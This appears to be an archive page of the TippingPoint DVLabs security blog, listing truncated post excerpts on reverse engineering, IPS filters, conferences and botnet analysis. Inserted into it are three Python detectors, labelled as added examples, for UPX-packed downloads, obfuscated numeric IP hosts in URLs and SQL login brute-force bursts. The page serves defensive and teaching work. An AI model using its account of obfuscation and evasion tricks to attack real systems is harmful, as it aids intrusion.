TippingPoint Digital Vaccine Laboratories

MindshaRE: Finding Object Constructors

In a previous MindshaRE we touched on the power of searching in IDA. This time I want to revisit that subject with an example of searching for constructors in a binary. This is a simple trick I use from time to time when I do not have symbols. Labeling objects before you start reverse engineering can be a huge help. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep thi ...


MindshaRE: Using Gflags

Microsoft's free set of debugging tools for Windows is invaluable when developing software or debugging vulnerabilities. One tool in particular that stands out (besides the venerable WinDbg) is Gflags. Gflags allows the user to set certain attributes on a process for the sole purpose of debugging. Today on MindshaRE we will take a look at the great options available when using Gflags and WinDbg. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal i ...


MindshaRE: Utilizing PyDbg Within IDA

Previously on MindshaRE we have demonstrated using PyDbg as a companion to IDA. Today I wanted to demonstrate how to use PyDbg from within IDA. With the power of IDA, IDAPython, and PyDbg you can create powerful tools that are extremely helpful when reverse engineering. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog his ...


MindshaRE: Importing Multiple Modules Into a Single IDB

A question that has no doubt come up for many IDA Pro users in the past is: how can one load multiple modules into a single IDB? The question has been answered a few times on forums such as OpenRCE, and even Ilfak Guilfanov has written a four-part blog series about it. In case all of that information is not enough, today on MindshaRE we are g ...


Using PyMSRPC to Trigger MS08-067

There has been a lot of talk around Microsoft's MS08-067 out-of-band bulletin. Alexander Sotirov decompiled and annotated the vulnerable routine, Metasploit released a working exploit, and in this post I will talk about a method you can utilize to qui ...


MindshaRE: Finding Executable Images in WinDbg

Working with malware often forces us to think outside of the box. The authors of malicious code employ a variety of techniques to keep investigative eyes from prying. To combat this we must also have some tricks up our sleeve. One such trick allows us to dump executables from a binary after it has been unpacked, is ready to be written to disk, or before it is executed. Today we take a look at this very method here on MindshaRE. MindshaRE is our weekly look at some simple reverse ...


Line Noise

It's now October, and time for another Line Noise. I have to warn you, this one is full of thrills and chills and massive linkage. Without further ado, here we go!


MindshaRE: Path Finding

How many times have you been at an address in IDA and wanted to know all the ways you could reach that point? A million? Probably not. But it's pretty useful to be able to find all the paths leading to a particular location in a binary. That's why today we are going to cover path finding. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going th ...


MindshaRE: Using Marks

Navigating in IDA Pro is generally an easy thing. Following functions, listing cross references, and going back to your previous location are all one key away. The problem is sometimes you can get a little lost and end up forgetting where you left off. That's why marks were invented. Today we briefly discuss using marks when reverse engineering. This is a very simple concept, but one I hope you adopt and integrate into your process. MindshaRE is our weekly look at some simple reverse en ...


BA-Con and Ekoparty 2008

Having sufficiently recovered from my week-long trip to Buenos Aires, it's time to spread the word about some of the innovative research presented at Argentina's two most prominent security conferences. My coworker Ali and I first attended BA-Con, the newest conference venture from Dragos Ruiu (of CanSecWest, PacSec, and EUSecWest fame). Some of the highlights incl ...


MindshaRE: First Things First

This week on MindshaRE we want to share some of the things we do when beginning a reversing project. Some of these are obvious, and some may be new. It all serves the purpose of creating a solid foundation for the hard work to follow. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history. It is important to kno ...


ThreatLinQ: Spyware and Executable Packers Revisited

Today marked another large spike in activity in our compressed binary download filters: a 420.3% increase for Filter 4111, which detects UPX-compressed binary downloads over HTTP. For those that enabled these filters after my previous post (you did, right?), you might have been surprised by the amount of activity on your particular network over the past few days. In response to this increase in activity, I decided to do some research to further substantiate my claims that these fil ...


MindshaRE: Naming Conventions

It is my belief that reverse engineering is one part patience, one part experience, and a whole lot of organization. OK, maybe that is a bit of an exaggeration, but organization is essential to reversing. Having a decent naming convention you stick to not only helps you in the short term, but also six months down the line when you or your co-workers look at your IDB. There is no "right" naming convention, but everyone should at least have one they use regularly. So today in MindshaRE we will cove ...


Line Noise

It's been a while, so I have a tasty treat for all of you. A super long rendition of Line Noise! Links from our IRC to your monitor!


ThreatLinQ: Enabling Packed Executable Filters

This post highlights TippingPoint IPS filters that look for packed or compressed binaries. Once the bastion of anti-virus software, these filters provide decent first-level protection against a lot of malware. We have seen statistics claiming that as much as 80% of all malware is packed in some fashion or another. While legitimate use of packers for commercial software has grown as well, I feel that with a bit of tuning these filters can offer excellent protection for your network. I would recommend put ...
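Filter 4111, referenced in this post and in the "Spyware and Executable Packers Revisited" entry above, looks for UPX-compressed binaries in HTTP downloads. The Python below is an added example, not DVLabs filter code and not from either post: it sketches the kind of check such a filter performs by splitting an HTTP response, walking the PE section table of the body, and flagging the default UPX section names (UPX0/UPX1/UPX2) and the "UPX!" magic that UPX leaves in its headers. The HTTP responses and PE images are constructed inline, and the section-name heuristic is exactly what a packer with renamed sections defeats, which is where the tuning the post mentions comes in.

```python
import struct

# Default section names written by UPX and the "UPX!" magic it leaves in
# its headers. Both are heuristics: a packer can rename sections, which is
# why this kind of filter needs tuning before it is set to block.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
UPX_SIGNATURE = b"UPX!"


def build_pe(section_names, trailer=b""):
    """Build a minimal PE32 image with the given section names.

    Constructed test data only: the headers are just complete enough for a
    section-table walk, and the result is not an executable program.
    """
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_of_optional = 0xE0  # PE32 optional header size
    coff_header = struct.pack(
        "<HHIIIHH",
        0x14C,               # Machine: IMAGE_FILE_MACHINE_I386
        len(section_names),  # NumberOfSections
        0, 0, 0,             # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
        size_of_optional,    # SizeOfOptionalHeader
        0x0102,              # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    )
    optional_header = struct.pack("<H", 0x10B) + b"\x00" * (size_of_optional - 2)
    # Each IMAGE_SECTION_HEADER is 40 bytes: an 8-byte name plus 32 bytes we zero.
    section_table = b"".join(
        name.encode("ascii").ljust(8, b"\x00") + b"\x00" * 32 for name in section_names
    )
    return dos_header + b"PE\x00\x00" + coff_header + optional_header + section_table + trailer


def pe_section_names(data):
    """Return the section names of a PE image, or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (size_of_optional,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + size_of_optional
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i:table + 40 * i + 8]
        if len(raw) < 8:
            break  # truncated download: report what we have
        names.append(raw.rstrip(b"\x00").decode("ascii", "replace"))
    return names


def classify_binary(data):
    """'not-pe', 'pe' or 'upx-packed' for one downloaded body."""
    names = pe_section_names(data)
    if names is None:
        return "not-pe"
    if UPX_SECTION_NAMES & set(names) or UPX_SIGNATURE in data:
        return "upx-packed"
    return "pe"


def classify_http_response(raw):
    """Split a raw HTTP response into head and body and classify the body."""
    _head, separator, body = raw.partition(b"\r\n\r\n")
    if not separator:
        return "incomplete"
    return classify_binary(body)


# Constructed responses standing in for what the sensor would see on the wire.
_HDR = b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
PACKED_RESPONSE = _HDR + build_pe(["UPX0", "UPX1", ".rsrc"], trailer=UPX_SIGNATURE)
CLEAN_RESPONSE = _HDR + build_pe([".text", ".rdata", ".data"])
HTML_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>hi</body></html>"

if __name__ == "__main__":
    for label, resp in (("packed", PACKED_RESPONSE), ("clean", CLEAN_RESPONSE), ("html", HTML_RESPONSE)):
        print(label, classify_http_response(resp))
```

The two checks are deliberately independent: a sample whose sections were renamed still trips on the "UPX!" magic, and a sample with the magic stripped still trips on the section names. Anything that renames both is what the commercial-packer false positives and the tuning discussion in the post are about.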


MindshaRE: WinDbg Introduction

Everyone has their favorite debugger. Sometimes the debugger debate can become almost religious. All that aside, you must be familiar with a debugger. Honestly it's just a matter of preference. WinDbg, OllyDbg/Immunity Debugger, and GDB will all accomplish the basic tasks you'll need in 90% of cases. So today I'm going to just get you started using WinDbg since it's my preference. A few commands to whet your whistle in the hopes you get motivated to practice until a debugger is second ...


ThreatLinQ: Spotlight on Filter 5682

On our last 'Spotlight' blog post we looked at a filter which is likely to hit thousands of times a day on your network. This time we are going to focus on a filter which hits much more rarely, but which is still an important filter to have in your arsenal: Filter 5682 "Suspicious Hexadecimal IP address in URL". In a nutshell, this filter detects an obfuscation technique used to disguise the target of a link. In most cases, web sites either link to hostnames (http://www.example.co ...
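Filter 5682 targets URLs whose host is a hexadecimal number rather than a hostname or a dotted-decimal address. The Python below is an added example, not the filter itself and not from the post: it normalizes every numeric host spelling that the C inet_aton() parser accepts (hexadecimal, octal, a single 32-bit dword, and mixed dotted forms), so the same check also catches the octal and dword variants of the trick, and it keeps plain dotted-decimal addresses as a separate verdict from the obfuscated spellings. The sample URLs are constructed test data.

```python
import re
from urllib.parse import urlsplit

# Label syntaxes accepted by the C inet_aton() parser that browsers inherit:
# a "0x" prefix is hexadecimal, a leading 0 is octal, anything else decimal.
HEX_LABEL = re.compile(r"0[xX][0-9a-fA-F]+")
OCT_LABEL = re.compile(r"0[0-7]*")
DEC_LABEL = re.compile(r"[1-9][0-9]*")


def parse_label(label):
    if HEX_LABEL.fullmatch(label):
        return int(label[2:], 16)
    if OCT_LABEL.fullmatch(label):
        return int(label, 8)
    if DEC_LABEL.fullmatch(label):
        return int(label, 10)
    return None


def numeric_host_to_ipv4(host):
    """Resolve an inet_aton-style numeric host to dotted decimal, or None.

    One to four dot-separated labels are allowed. Every label but the last
    is a single byte; the last label fills the remaining bytes, so
    "0xC0.0xA8.1" is 192.168.0.1 and "3232235521" is the address as a dword.
    """
    labels = host.split(".")
    if not 1 <= len(labels) <= 4:
        return None
    values = [parse_label(label) for label in labels]
    if any(v is None for v in values):
        return None
    *leading, last = values
    if any(v > 0xFF for v in leading):
        return None
    remaining_bits = 8 * (4 - len(leading))
    if last >= 1 << remaining_bits:
        return None
    addr = 0
    for v in leading:
        addr = (addr << 8) | v
    addr = (addr << remaining_bits) | last
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def is_plain_dotted_decimal(host):
    """Four decimal labels, no leading zeros (which would be octal), each <= 255."""
    labels = host.split(".")
    return len(labels) == 4 and all(
        re.fullmatch(r"0|[1-9][0-9]{0,2}", label) is not None and int(label) <= 255
        for label in labels
    )


def classify_url_host(url):
    """Return (verdict, canonical host) for the host part of a URL.

    Verdicts: 'hostname', 'dotted-decimal-ip', 'obfuscated-ip' or 'no-host'.
    """
    host = urlsplit(url).hostname  # lower-cased, port stripped
    if not host:
        return ("no-host", None)
    ip = numeric_host_to_ipv4(host)
    if ip is None:
        return ("hostname", host)
    if is_plain_dotted_decimal(host):
        return ("dotted-decimal-ip", ip)
    return ("obfuscated-ip", ip)


# Constructed test URLs; all of the numeric ones spell 192.168.0.1.
SAMPLE_URLS = [
    "http://www.example.com/login",
    "http://192.168.0.1/login",
    "http://0xC0A80001/login",
    "http://3232235521/login",
    "http://0300.0250.0.01/login",
    "http://0xC0.0xA8.1/login",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url, "->", classify_url_host(url))
```

Normalizing to dotted decimal before matching is what lets a filter or log search compare the real target against a block list instead of the spelling the attacker chose.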


MindshaRE: Live Analysis Markup

I have mentioned before that I am always trying to bridge the gap between static analysis and live analysis. I try to always reverse statically, but let's face it, sometimes due to time constraints, complexity, or dynamic resolution of functions we need a little help from our favorite debugger. So today I'll demonstrate a little tool I use to help me easily pull the information I need from a debugger and still stay focused in IDA. My simple live analysis markup utility might help you in these situ ...


ThreatLinQ: A Look at Adobe Flash Policy Files

Over the past few weeks I have been looking at Adobe Flash 9, specifically the policy file changes that were introduced with this version. By default, cross-domain communication is not allowed by Adobe Flash. Cross-domain communication violates the same-origin policy that should be enforced by Internet applications, such as web browsers and browser extensions, in order to protect users and servers from cross-site request ...


ThreatLinQ: Movers and Shakers

Alright, it's time for an installment of ThreatLinQ: Movers and Shakers. Almost every week we will use this space to point out any interesting and/or sudden events we may see in the ThreatLinQ data. This week there are a couple of PHP File Include filters which popped up on the Movers and Shakers page which are worth talking about. First, Filter 4270 saw a sudden increase in traffic on 9/08/2009. This was due entirely to a single attacker from New Jersey targeting various PHP file includ ...


ThreatLinQ: Taking Out the Trash

One of the often-cited benefits of an IPS is the ability to keep ancient attacks from 'polluting' your otherwise pristine network. The fact is, attacks such as Code Red and SQL Slammer are still out there in force. And while there may be literally a 0% chance of these attacks being successful on a machine in your environment, there is simply no reason to let them into your network. Of course, when we tell people this, the first question we often get asked is "are these attacks R ...


MindshaRE: Using Structures

This week on MindshaRE we take a quick look at structures. I often see new reverse engineers skipping the creation of structures they encounter when disassembling a binary. While it is true that they can be slightly time consuming to create, the payoff in the end can far outweigh the minimal time investment. The biggest benefit comes with things like OO method invocation, file format parsing, or packet tracing. Hopefully the examples I have will convince you to spend those extra 20 ...


Three Letter Acronyms and the Imminent Death of the Net

Years ago, I was much more heavily involved in the network engineering side of the network world. Don't get me wrong, there's still plenty of groveling through packet captures here at TippingPoint's orbiting HQ, but I used to actually design networks and configure routers and do all of the nuts-and-bolts stuff that makes networks run. As a result of this, I know a reasonable amount about various low-level network protocols, including the wonderful, critical, byzantine, and obscure ...


ThreatLinQ: A Brave New World: Legitimate Script Obfuscation

As a filter writer, there is a blurred line between blocking real attacks and Internet annoyances. For example, today's Internet advertisements often use the same obfuscation tactics as attackers in order to avoid scrubbing by content filtering systems. I have been doing some research on Peer-To-Peer (P2P) filters and came across something that illustrates this point very nicely. I came across the following trace that was sent to a server on one of my IP watch lists: 0000 ...


MindshaRE: The IDA Pro Book

IDA can be a very intimidating program to use. When starting out, not only are you trying to get comfortable with assembly, but you also must navigate a program with a steep learning curve. IDA's lack of documentation, aside from ida.hlp, compounds this problem, leaving you somewhat insecure in your endeavor. Not anymore. A new book has been published by No Starch Press titled " ...


ThreatLinQ: A tale of two attackers

After my previous blog post last week about MS-SQL brute force attackers, I asked myself the question "who /are/ these guys?" I mean, there are a lot of different attacks out there, why choose this one? So, today I spent a couple hours trying to answer this question. Specifically, I decided to take the top 25 attackers from filter 463 'Bad MS-SQL SA Login', port scan them with OS detection and some other probes, and then compare them with the top 25 attackers from our 'PHP File in ...


ThreatLinQ: Using Filter Groups - Guilty By Association

This post shows how the “Filter Group” section of the website can be used to find some very interesting events. Let's start by looking at the “Metasploit Shellcode” group, which is more often than not a very good starting point for finding malicious attackers. Not surprisingly, in analyzing ThreatLinQ data we have noticed that shellcode filters fire in tandem with many severe attacks. This makes sens ...


Line Noise

It's that awesome time, unscheduled by conventional schedules, for the blog that everyone loves to power Fridays with: Line Noise! First up, Ali found a paper on someone implementing a sublanguage within Haskell in order to enforce data flow control for security reasons. Cool in concept, especially if you're a fan of functional programming. Here's a set of new ...


Where are the Apples of Yesteryear?

There was a time, not so long ago, when Apple was the plucky upstart. They weren't the second-largest music retailer in the United States. They didn't hold a virtual monopoly on portable music players, and they didn't capture nearly half of the high-end laptop market. Apple was instead a geek's company. They were open and friendly, flexible and more than a little quirky. Sure, the fact that large portions of their code are open source is great, and certainly something of which ...


MindshaRE: Fixing Functions

IDA's function identification has always frustrated me. I could never understand why seemingly undefined functions weren't discovered during analysis. Recently, while attending RECon, I got my answer. While Ilfak, the creator of IDA, was giving a talk he explained why: he always errs on the side of caution. Meaning, unless he is 100% positive about a function, he will leave it up to the user to fix. This isn't such a bad philosophy, unless you are dealing with hundred-megabyte binaries. Regardle ...


Blackmail, Extortion or same old game?

My heart skipped at least two beats today when I opened a Google Alert and read the headline “Researcher Blackmails Sun, Nokia” followed by a very brief description including not much more than a reference to the Zero Day Initiative. In a panic I read the ZDNet article and then checked out the Security Explorations website, carefully poring over their FAQs ...


ThreatLinQ: Spotlight on Filter 1401 (MS-SQL: Login Failure)

One of the cool things about the new ThreatLinQ tool is that we get to see TippingPoint filters which have been shipping for years still protecting customers. Today, I'd like to point out one of those filters in particular: Filter 1401 - MS-SQL: Login Failure. This filter does not ship enabled by default (generally speaking, login failures are entirely non-malicious), but if configured properly, this filter can be very useful for blocking brute force attacks. To illustrat ...


MindshaRE: Arithmetic in Assembly

In a previous MindshaRE we looked at loops in assembly. I feel writing chunks of code in C and then disassembling them is an important bridge between higher level languages and assembly when you first start reversing. This allows you to quickly recognize patterns and translate them back into their higher level representation. Doing this is imperative to understanding a binary when reversing. So today we will do a short followup and look at arithmetic in assembly. ...


ThreatLinQ: Movers and Shakers

Here we are looking at a filter that recently made the ThreatLinQ “Movers and Shakers” list, namely filter 1401 “MS-SQL: Login Failure.” We began watching this filter around 7-20-08 and it seems that it was just in time. On 7-21-08 we saw a sharp increase in filter hits, and the majority of these hits are unique destination IP addresses, which is denoted by the blue bar. This pattern is often indicative of brut ...
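Both Filter 1401 posts above ("Spotlight on Filter 1401" and this "Movers and Shakers" entry) describe turning login-failure hits into brute-force detection, and this post points at the tell-tale of many unique destination addresses coming from one source. The Python below is an added example, not ThreatLinQ or IPS code: it applies a sliding-window threshold to a stream of filter events, alerts once per source address when a configurable number of filter 1401 hits land inside the window, and reports how many distinct destinations that source touched in the window. The event line format, the sample events, and the threshold and window values are constructed assumptions for this example, not TippingPoint's export format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed event format, an assumption for this example and not a
# TippingPoint export format: "<date> <time> filter=<id> src=<ip> dst=<ip>"
EVENT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) filter=(?P<filter>\d+) src=(?P<src>\S+) dst=(?P<dst>\S+)$"
)

# Constructed sample: one source sweeping login failures across many servers
# (with a stale hit two hours earlier that must age out of the window), one
# source with a couple of ordinary failures, and one unrelated filter hit.
SAMPLE_EVENTS = """\
2008-07-21 08:00:00 filter=1401 src=203.0.113.9 dst=192.0.2.99
2008-07-21 10:00:00 filter=1401 src=203.0.113.9 dst=192.0.2.10
2008-07-21 10:00:03 filter=1401 src=203.0.113.9 dst=192.0.2.11
2008-07-21 10:00:05 filter=463 src=203.0.113.9 dst=192.0.2.11
2008-07-21 10:00:07 filter=1401 src=198.51.100.4 dst=192.0.2.10
2008-07-21 10:00:09 filter=1401 src=203.0.113.9 dst=192.0.2.12
2008-07-21 10:00:14 filter=1401 src=203.0.113.9 dst=192.0.2.13
2008-07-21 10:00:20 filter=1401 src=203.0.113.9 dst=192.0.2.14
2008-07-21 10:00:25 filter=1401 src=203.0.113.9 dst=192.0.2.15
2008-07-21 10:00:31 filter=1401 src=198.51.100.4 dst=192.0.2.10
"""


def parse_event(line):
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "filter": m["filter"],
        "src": m["src"],
        "dst": m["dst"],
    }


def detect_login_bruteforce(lines, filter_id="1401", threshold=5, window_seconds=60):
    """Alert once per source when `threshold` hits fall inside a sliding window.

    Events must arrive in time order. Each alert also counts the distinct
    destinations the source hit inside the window: one source failing against
    many servers is a sweep, not a user mistyping a password.
    """
    recent = defaultdict(deque)  # src -> deque of (ts, dst) inside the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["filter"] != filter_id:
            continue
        window = recent[ev["src"]]
        window.append((ev["ts"], ev["dst"]))
        while (ev["ts"] - window[0][0]).total_seconds() > window_seconds:
            window.popleft()  # age out hits older than the window
        if len(window) >= threshold and ev["src"] not in alerted:
            alerted.add(ev["src"])
            alerts.append({
                "src": ev["src"],
                "failures": len(window),
                "distinct_dsts": len({dst for _, dst in window}),
                "first_seen": window[0][0].strftime("%Y-%m-%d %H:%M:%S"),
                "last_seen": ev["ts"].strftime("%Y-%m-%d %H:%M:%S"),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_login_bruteforce(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

The threshold is what keeps a filter that "does not ship enabled by default" useful: a single failure is noise, five failures from one source in a minute against five different servers is the pattern the posts describe, and the distinct-destination count is what separates that sweep from one user locked out of one server.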


ThreatLinQ: Javascript Bad Juju

The game of obfuscating code, especially JavaScript, has been going on for a while. Attackers are coming up with simple and ingenious ways to evade "string"-based detection. One of our sensors caught this clever technique for evading string-based detection of ActiveX CLSIDs. With hundreds of ActiveX vulnerabilities out there, it is very common to see mass exploitation of them. Here is a cool trick we saw in action: <script>start();function z_sa(o,p, ...


ThreatLinQ: Bad to the Bone

If you've gone to any security conference over the last year, you surely have heard that threats on the Internet are moving from general purpose, noisy attacks to highly targeted attacks designed to attack only YOU... personally. Now that the ThreatLinQ program is up and running, it is satisfying to notice that many attackers are not only performing their attacks on multiple hosts, they commonly use many different attack vectors and payloads. Take this IP address for instance: 89.156 ...


ThreatLinQ: ThreatLinQ Launch By DVLabs

TippingPoint DVLabs announced the availability of the "ThreatLinQ" Beta portal to all our customers today. The ThreatLinQ portal provides TippingPoint customers with the latest information on the global attack landscape. The information provided is an excellent source of background information, as well as actionable data for consideration in configuration of the IPS. We will also be posting summaries of our findings and analysis regularly via this blog. W ...


MindshaRE: Anti-Reversing Techniques

Anti-reversing tricks have been around for a long time. They most commonly occur in malware or spyware applications. However, in recent times more applications are incorporating them into their code. This might be to thwart reversing of intellectual property, or perhaps modification of the binary at run time. So today we take a quick look at some of the most common categories anti-reversing techniques fall into, and a few examples from each type. MindshaRE is o ...


MindshaRE: Using Symbols

I've mentioned in a previous posting that cross references are the crux of reverse engineering. Exploring the connections between blocks of code and from function to function will reveal large quantities of information about your target. Those cross references however are useless without symbolic information, which can include names generated by the reverse engineer as well as names applied through a symbol file. Symbol files are easy to use, yet I still see people that are unaware of them, or d ...


MindshaRE: Cross References in IDA

I would say that, besides the navigation keys (Esc, Enter, Ctrl-Enter, Arrows), the key sequence I use most often is X / Ctrl-X. That's right, cross references. Okay, maybe I use others just as much, but for today's MindshaRE we will be discussing cross references in IDA (I wanted to add some impact to the topic). I will briefly cover what they are, the different types of references, and share some scripts utilizing xrefs that hopefully make your day easier. MindshaRE is our w ...


Building a Better Mousetrap: This Year at Black Hat

Are you interested in joining the exalted ranks of vulnerability analysts? Are you responsible for your organization's IPS/IDS deployment? Would you like to use those IPS/IDSes to the fullest of their potential? Well, you're in luck! Rohit and I are presenting a class at this year's Black Hat information security conference! ...


Line Noise

Hello to all of my delicious readers of the blogosphere! It's time for another wacky installment of Line Noise, so you can walk a mile in our shoes, if our shoes weren't for walking and consisted solely of stories passed back and forth on an IRC server! First up is a link to BitDefender's new portal with a GTA theme. On a note that probably wouldn't fly in the computer security industry, Japan ...


Everything old is new again (again)!

It's a testimony to the scalability of version 4 of the Internet Protocol that it has scaled from a network of a few dozen hosts to a globe-spanning network indispensable to hundreds of millions of people. But, like all good things, the reign of IPv4 is coming to an end. It's really an example of necessity: large swaths of the world are running out of IP space. The United States federal government has mandated that all its systems be capable of supporting IPv6 by 2008. Operating sy ...


Firefox 3.0 Vulnerability Patched

Less than a month after its official release, Mozilla fixed the vulnerability we reported to them in Firefox 3.0. This vulnerability was acquired through our Zero Day Initiative and reported responsibly to Mozilla on June 17th, 2008. Mozilla was able to fix this issue in a timely mann ...


MindshaRE: Hit Tracing in WinDbg

MindshaRE has focused exclusively on static analysis so far. That is fine and all, but often we need a little dynamic help. This can be due to virtual function calls, dynamic library calls, or just to speed things up. So today we will add a little WinDbg to our diet and talk about hit tracing. I will also show a little script that lets us trace a process and import that trace into IDA. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. ...


MindshaRE: Strings!

In this week's MindshaRE we will take a look at strings. We will cover some of the obvious uses for strings as well as helpful applications of strings in the binary. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history. String examination is a frequent starting point for many reverse engin ...


MindshaRE: Identifying Encryption Functions

Welcome back to another installment of MindshaRE. This week we will cover identifying a common pattern seen in encryption and compression functions. The purpose is to quickly identify locations of interest in a binary that may handle this type of activity. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through o ...


Cellular Interference

Like many others in the world, I've always been a skeptic of the need to disable cell phone antennas on takeoff and landing. What kind of interference could possibly be caused to an airplane? We've all dealt with the minor nuisance of clicks and beeps when someone on a land line keeps their cell phone too close to the base, but serious interference to a plane? I always figured it was a better safe than sorry measure... Until a couple of weeks ago when I was doing some work in Photoshop on my ol ...


MindshaRE: Adding IDA to Explorer Context Handler

In this week's MindshaRE we will show you how to add IDA to the right-click context menu of Windows Explorer. This is handy when quickly disassembling DLLs and EXEs. MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history. When disassembling binaries in IDA most people will go through a ...


Hacking the Pirates of the Caribbean Online MMORPG

My colleague Ali and I recently presented on Reverse Engineering Dynamic Languages, specifically Python, at RECON 2008. As a case study, we demonstrated hacking cheats into Disney's Pirates of the Caribbean Online game (slides here). The game has receiv ...


Line Noise

One comment and one angry email were all the encouragement we needed to keep Line Noise alive, so it's time again for another one, so you can witness the extremely work-safe version of the links the DVLabs research team has been sharing with each other on our internal IRC. RepRap is a 3D rapid prototyper that can be built on the cheap. All of the com ...


MindshaRE: Searching in IDA

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history. In this week's installment of MindshaRE we will take a look at some fun uses for searching in IDA, even utilizing IDC/IDAPython to automate this. IDA provides several different search options. Rangin ...


Mozilla Firefox 3.0 Vulnerability

A number of people who monitor our Zero Day Initiative's Upcoming Advisories page noticed yesterday that we reported a vulnerability to Mozilla (ZDI-CAN-349). Taking into account the coincidental timing of the Firefox 3.0 release, many are asking us if this is the first reported critical vulnerability in the latest version of the popular open source browser. What we can confirm is that about five hours after the of ...


RECON 08 Day 3

It's Monday and I'm back at our Austin headquarters with the team. We had a great time at RECON and in Montreal. Big thanks to the conference organizers and the high quality speakers. Three more interesting talks to mention on the final day of the conference... Pablo Sole from Immunity gave an overview of how Python scripting within ImmunityDbg can be used to assist in reverse engineer ...


RECON 08 Day 2

Some more interesting talks on the second day of the con. Craig Smith from Neohapsis gave an informative presentation on creating a custom code obfuscation virtual machine. The usage of a custom VM to obfuscate code has mostly been seen in various crackmes, though it is starting to gain popularity in malware. There are legitimate commercial code virtualizers like Themida. This was an interesting talk and thought exercise that captured the attention of many at ...


RECON 08 Day 1

RECON is a single-track reverse engineering focused conference held bi-yearly in Montreal. The 2008 showing is the third iteration of the conference, with hopefully many more to come. RECON is hands down my favorite conference, a sentiment shared by many other RECON attendees. A number of factors elevate this con above others: The talks. The general technical level of the talks at RECON, I feel, exceeds most other cons. The size. RECON feels like t ...


MindshaRE: Looping in Assembly

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history. After the entry last week comparing source to disassembly, I thought it might be a good idea to cover some basics. Often when learning how to read assembly it helps to take source code, compile it, and then look at it in your disassembler of ch ...


MindshaRE: Public Toolkits

This entry marks the first in a new weekly post I will be doing about general reverse engineering tips and tricks. The focus of this blog will be to relay some simple tricks we apply here at TippingPoint that others might find useful while reverse engineering. My goal is to be short and concise in these examples. If you have any ideas, or suggestions (possibly to improve on something I posted) please email me, or leave a comment, and I'd be happy to share them in future posting ...


Line Noise

As a research team we come across a variety of interesting articles, papers and links ranging from cutting edge security research to silly web toys. We're constantly sharing information and commentary with one another and thought that it may be interesting for others to join in on the fun. So we have decided to dedicate some time to creating a generic "week in review" blog series. We'll see how it goes and we'll decide on whether or not to keep it up based on the feedback we receive. To ...


Owning Kraken Zombies, a Detailed Dissection

This blog contains the deep technical dive of a two-part blog series exploring the Kraken botnet. See "Kraken Botnet Infiltration" for more information regarding general statistics and observations of the botnet. Disclaimer: I don't normally deal with malicious code analysis. My main focuses are on vulnerability discovery and general reversing, so dedicating some time to analyzing Kraken was a new and interestin ...


Kraken Botnet Infiltration

Earlier this month a number of articles surfaced on the research and disagreements with regards to the size and classification of a large botnet named Kraken. At the front line of the debate were SecureWorks and Damballa. SecureWorks claims Kraken is actually Bobax and estimates the botnet to include over 185,000 compromised systems. Damballa disag ...


ToorCon Seattle Redux

This past weekend, Aaron and I attended and presented at ToorCon Seattle 2008...


PWN to OWN Adobe patch released

This year’s PWN to OWN wrap up includes another record breaking update by the affected vendor. Adobe has released a Flash update which corrects the bug found by Shane Macauley that he used to exploit the Windows Vista laptop at CanSecWest, as well as correcting a number ...


PWN to OWN: Final Day (and another winner!)

The third and final day of the PWN to OWN contest at the CanSecWest security conference begins today, March 28th at 12:30pm local time (PST) in Vancouver. Yesterday, on day two of the contest, the MacBook Air was successfully compromised first and won by a team from Independent Security Evaluat ...


PWN to OWN Day Two: First Winner Emerges! (updated)

Congratulations to our first winner of the CanSecWest PWN to OWN contest! At 12:38pm local time, the team of Charlie Miller, Jake Honoroff, and Mark Daniel from Independent Security Evaluators have successfully compromised the Apple MacBook Air, winning the laptop and $10,000 from TippingPoint's Zero Day Initiative. They were ...


Hello from Black Hat Europe

Ero and I finished up our two day Reverse Engineering course yesterday and caught up on some much needed sleep after a few drinks at some local pubs. Got a chance to catch some of the talks today prior to flying out tomorrow morning to Barcelona for the weekend. FX had a well researched talk on ...


Day One: CanSecWest PWN to OWN Results

